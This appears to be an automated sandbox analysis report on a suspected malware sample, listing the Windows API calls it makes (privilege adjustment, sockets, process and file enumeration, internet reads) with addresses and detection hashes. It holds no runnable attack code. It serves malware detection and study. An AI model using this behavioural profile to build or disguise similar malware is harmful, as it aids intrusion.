                                                                                                                • Instruction Fuzzy Hash: CAA15DB03165ECBADF24AB2B8C4CEBF359EFF87749B150129F502D5192CA349D4192B2
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0094BCE6
                                                                                                                • _wcscmp.LIBCMT ref: 0094BD16
                                                                                                                • _wcscmp.LIBCMT ref: 0094BD2B
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0094BD3C
                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0094BD6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2387731787-0
                                                                                                                • Opcode ID: 1e7c3dcf91c92bebdf126cac18681fb136bb87e76f60f1354d19f8fd352b51f4
                                                                                                                • Instruction ID: bdde01a2e2f6a047d5d3a460befb9db59090b59d01a96ac55c01ff91496ee009
                                                                                                                • Opcode Fuzzy Hash: 1e7c3dcf91c92bebdf126cac18681fb136bb87e76f60f1354d19f8fd352b51f4
                                                                                                                • Instruction Fuzzy Hash: 31518D75A046029FC714DF68D490E9AB3E8FF4A324F10496DF96A8B3A1DB70ED04CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00957D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00957DB6
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0095679E
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009567C7
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00956800
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0095680D
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00956821
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 99427753-0
                                                                                                                • Opcode ID: 554378833039d7244e72d841fb59ede9991ce04cd89104776528c48e13c89204
                                                                                                                • Instruction ID: fffb0e9e6bbc65cbc454da580954ce27086aefc24573f227ac2c3001cc0d8fd2
                                                                                                                • Opcode Fuzzy Hash: 554378833039d7244e72d841fb59ede9991ce04cd89104776528c48e13c89204
                                                                                                                • Instruction Fuzzy Hash: 6341D675700214AFDB50EF299C86F2E77A8EF4A714F44846CF959EB3D2CAB09D008792
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: 3389d92c4556afad8b56b9c21d7bab76030386e50ab795499bb85abcb1144b58
                                                                                                                • Instruction ID: e0e0bc504cbe91389dab15003afffd40d40f451739ccf8ca84cadc453855106d
                                                                                                                • Opcode Fuzzy Hash: 3389d92c4556afad8b56b9c21d7bab76030386e50ab795499bb85abcb1144b58
                                                                                                                • Instruction Fuzzy Hash: 7011B231300915ABDB216F26DC54E6B7B9CFF85BA1F428439F846D7351CBB09D018AA5
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009380C0
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009380CA
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009380D9
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009380E0
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009380F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: c04d873043f59418caa7538961090e2c968be3b743d17982c7d60584dbcd2f35
                                                                                                                • Instruction ID: 37b1e2089980d0158d78a3afa0a60b2d6b3b87ad1416bdf5c7970327708cee7e
                                                                                                                • Opcode Fuzzy Hash: c04d873043f59418caa7538961090e2c968be3b743d17982c7d60584dbcd2f35
                                                                                                                • Instruction Fuzzy Hash: 28F0627126C304AFEB100FA5EC9DE673BACFF8A795F000029F945C6150CBA19C41EE60
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0094C432
                                                                                                                • CoCreateInstance.OLE32(00972D6C,00000000,00000001,00972BDC,?), ref: 0094C44A
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • CoUninitialize.OLE32 ref: 0094C6B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2683427295-24824748
                                                                                                                • Opcode ID: eebe7cdba0307a38e6f7d658a909316b5b812eb03593deadcc61bc7e73445b2f
                                                                                                                • Instruction ID: c5faac222a7b92cf54e86b11212b5bf940c3c33838f6c74daaabc26b9f306ae2
                                                                                                                • Opcode Fuzzy Hash: eebe7cdba0307a38e6f7d658a909316b5b812eb03593deadcc61bc7e73445b2f
                                                                                                                • Instruction Fuzzy Hash: 91A12AB1104245AFD700EF59C891EABB7A8FF86354F00492CF199D71A2DB71AA09CB63
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,008E4AD0), ref: 008E4B45
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008E4B57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                • Opcode ID: f7027ce2694836b10f26b25d603bca38fe14da7e6e4fc00d3905ca0bda5670dc
                                                                                                                • Instruction ID: 3ec9525df1f4e920528f6203c7c07a3955ec6fc1fbf88f31087a8aa7bb845be6
                                                                                                                • Opcode Fuzzy Hash: f7027ce2694836b10f26b25d603bca38fe14da7e6e4fc00d3905ca0bda5670dc
                                                                                                                • Instruction Fuzzy Hash: 0FD01735A24713CFD7209F72F838B0676E4FF863A5B12987ED49AD6150E6B0E880CA54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 674341424-0
                                                                                                                • Opcode ID: 3844651e54407baa505b9fe7707e1634e059d6068176d54b71917f00b7b9f705
                                                                                                                • Instruction ID: dae93d7d00d5aae3600b03f99a0cc3b4b8b13e263c499e4c4c0112b6d4a32bc5
                                                                                                                • Opcode Fuzzy Hash: 3844651e54407baa505b9fe7707e1634e059d6068176d54b71917f00b7b9f705
                                                                                                                • Instruction Fuzzy Hash: 7E2297716083549FC724DF28D881BAAB7E4FF95314F10492DFA9AD7291DB70EA04CB92
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0095EE3D
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0095EE4B
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0095EF0B
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0095EF1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2576544623-0
                                                                                                                • Opcode ID: fa20b51796a722139e41fbc512eeec3ebe5ba439a9c4667f5d4244a519bfc6cd
                                                                                                                • Instruction ID: eaa48b9f0c90e9952bd8729fb0320061ad304802e01efaea7c6d33d7484ebbb9
                                                                                                                • Opcode Fuzzy Hash: fa20b51796a722139e41fbc512eeec3ebe5ba439a9c4667f5d4244a519bfc6cd
                                                                                                                • Instruction Fuzzy Hash: 30516D71508351AFD310EF29DC81E6BBBE8FF95750F40482DF995D62A1EB70A908CB92
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0093E628
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($|
                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                • Opcode ID: 3a99ba212c5ec43803cea9aaa45fd9010cb494f24e85b445cf872f10d4b291dd
                                                                                                                • Instruction ID: f8a79888f136ef0f4d76818cf336efe3a33c71c952dd4da9d2ef1a203ed75e4b
                                                                                                                • Opcode Fuzzy Hash: 3a99ba212c5ec43803cea9aaa45fd9010cb494f24e85b445cf872f10d4b291dd
                                                                                                                • Instruction Fuzzy Hash: 6B320275A007059FDB28CF19C481AAAB7F5FF48320B15C56EE89ADB3A1E770E941CB44
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0095180A,00000000), ref: 009523E1
                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00952418
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 599397726-0
                                                                                                                • Opcode ID: 09ec3c5e17d65b3ac200cc6a4eadf14597eb9b915745ab3e7933b533fa99b2c7
                                                                                                                • Instruction ID: 96c88d1058cb7941898fac82b10dfea8ed762969d74f770621eb307a5058368d
                                                                                                                • Opcode Fuzzy Hash: 09ec3c5e17d65b3ac200cc6a4eadf14597eb9b915745ab3e7933b533fa99b2c7
                                                                                                                • Instruction Fuzzy Hash: E941F471904209BFEB10DF96DC81FBB77ACEB82716F10402AFE01A6190EA759E499760
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0094B40B
                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0094B465
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0094B4B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1682464887-0
                                                                                                                • Opcode ID: 1cecf692abc5101c0622a2a1f19e91b6163ce9603f5cf3845bcc1d0bfb284cf8
                                                                                                                • Instruction ID: 8aed45f5477e645d22c80a9a354fbf853059de826d4d3fe28d8d2d219ed076fc
                                                                                                                • Opcode Fuzzy Hash: 1cecf692abc5101c0622a2a1f19e91b6163ce9603f5cf3845bcc1d0bfb284cf8
                                                                                                                • Instruction Fuzzy Hash: 6F216275A10118EFCB00EFA5E890EEDBBB8FF49314F1480AAE945EB361DB319915CB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00900DB6: std::exception::exception.LIBCMT ref: 00900DEC
                                                                                                                  • Part of subcall function 00900DB6: __CxxThrowException@8.LIBCMT ref: 00900E01
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0093882B
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00938858
                                                                                                                • GetLastError.KERNEL32 ref: 00938865
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1922334811-0
                                                                                                                • Opcode ID: 8451361effad1382cb54d3e04daef839d20e8d5b52b661883891bb2b074b5a89
                                                                                                                • Instruction ID: 16b69c8e4f04684e238e3ff2ffca951f7abda67137ecbbe2a8e5141bd480744a
                                                                                                                • Opcode Fuzzy Hash: 8451361effad1382cb54d3e04daef839d20e8d5b52b661883891bb2b074b5a89
                                                                                                                • Instruction Fuzzy Hash: 53118FB2414305AFE718DFA4EC85E6BB7FDEB84710B20852EF45597241EB70BC408B60
                                                                                                                APIs
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00938774
                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0093878B
                                                                                                                • FreeSid.ADVAPI32(?), ref: 0093879B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429775523-0
                                                                                                                • Opcode ID: 9f057f81cb7c2b70f5fd128bcfbc9a6f6eea47b4cd68a92d6de9339cb0dad239
                                                                                                                • Instruction ID: 68f1333a4e48e091c6e89b901f27fbb5efc994ea855324decb8e0c53de2f8b89
                                                                                                                • Opcode Fuzzy Hash: 9f057f81cb7c2b70f5fd128bcfbc9a6f6eea47b4cd68a92d6de9339cb0dad239
                                                                                                                • Instruction Fuzzy Hash: 24F04F7591530CBFDF00DFF4DD99AAEB7BCEF08301F104469E501E2181D6755A049B50
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0094C6FB
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094C72B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: cb55fa43b24c83d80bb5cfccdf41a6e48e398a05815d53e78a1583771a4329f4
                                                                                                                • Instruction ID: b9d4de4e0596954aa35de1a5c2ca9ecc3269d2f1c2d2da447fd930f737e3eeac
                                                                                                                • Opcode Fuzzy Hash: cb55fa43b24c83d80bb5cfccdf41a6e48e398a05815d53e78a1583771a4329f4
                                                                                                                • Instruction Fuzzy Hash: 09118E726002009FDB10DF29D855A2AF7E8FF85364F00852EF8A9C72A0DB70A801CF81
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00959468,?,0096FB84,?), ref: 0094A097
                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00959468,?,0096FB84,?), ref: 0094A0A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479602957-0
                                                                                                                • Opcode ID: 62be5719996420deef9892b4ba7b4329937ce154d2ebeb80c9df6a018b2e71a0
                                                                                                                • Instruction ID: 51c84e71656db05d61441ef08f37886b36a3843da7f89a3fa3acd1afe9d56311
                                                                                                                • Opcode Fuzzy Hash: 62be5719996420deef9892b4ba7b4329937ce154d2ebeb80c9df6a018b2e71a0
                                                                                                                • Instruction Fuzzy Hash: 0EF0273524422DBBDB219FA4DC48FEA736CFF09361F004269F918D3180C6709940CBA2
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00938309), ref: 009381E0
                                                                                                                • CloseHandle.KERNEL32(?,?,00938309), ref: 009381F2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                • Opcode ID: 371f901f307b58b832ae0aee6d3efba638d6b520b30e413945350abe4078771f
                                                                                                                • Instruction ID: a13ec44251c929f430db624895c5e69924f72b99e29221a83dae6b3a52affdb6
                                                                                                                • Opcode Fuzzy Hash: 371f901f307b58b832ae0aee6d3efba638d6b520b30e413945350abe4078771f
                                                                                                                • Instruction Fuzzy Hash: CAE0E672014611AFE7252B60FC05E7777EDEF44350B24882DF45594470DB616C91DB10
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00908D57,?,?,?,00000001), ref: 0090A15A
